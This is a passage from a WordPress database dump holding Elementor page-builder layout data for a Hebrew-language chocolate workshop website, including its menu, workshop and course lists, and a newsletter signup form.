\\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(815,167,'_elementor_version','2.9.8'),(816,170,'_wp_page_template','elementor_canvas'),(817,170,'_elementor_edit_mode','builder'),(818,170,'_elementor_data','[{\"id\":\"6ca0db42\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"575d07f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4ff16304\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"13ef3f01\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2374377f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"20511488\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4a34667\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f9f9337\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bc8044c\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_show_excerpt\":\"\",\"cards_meta_data\":[],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"\\u05dc\\u05e7\\u05e8\\u05d9\\u05d0\\u05d4 \\u00bb\",\"cards_show_avatar\":\"\",\"offset\":\"\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(819,170,'_elementor_version','0.4'),(820,171,'_wp_page_template','elementor_canvas'),(821,171,'_elementor_edit_mode','builder'),(822,171,'_elementor_data','[{\"id\":\"6ca0db42\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"575d07f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4ff16304\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"13ef3f01\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2374377f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"20511488\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4a34667\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f9f9337\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"972ca81\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d4\\u05de\\u05d2\\u05d6\\u05d9\\u05df \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e467453\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":4},\"width\":{\"unit\":\"%\",\"size\":42},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"bc8044c\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_show_excerpt\":\"\",\"cards_meta_data\":[],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"\\u05dc\\u05e7\\u05e8\\u05d9\\u05d0\\u05d4 \\u00bb\",\"cards_show_avatar\":\"\",\"offset\":\"\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea 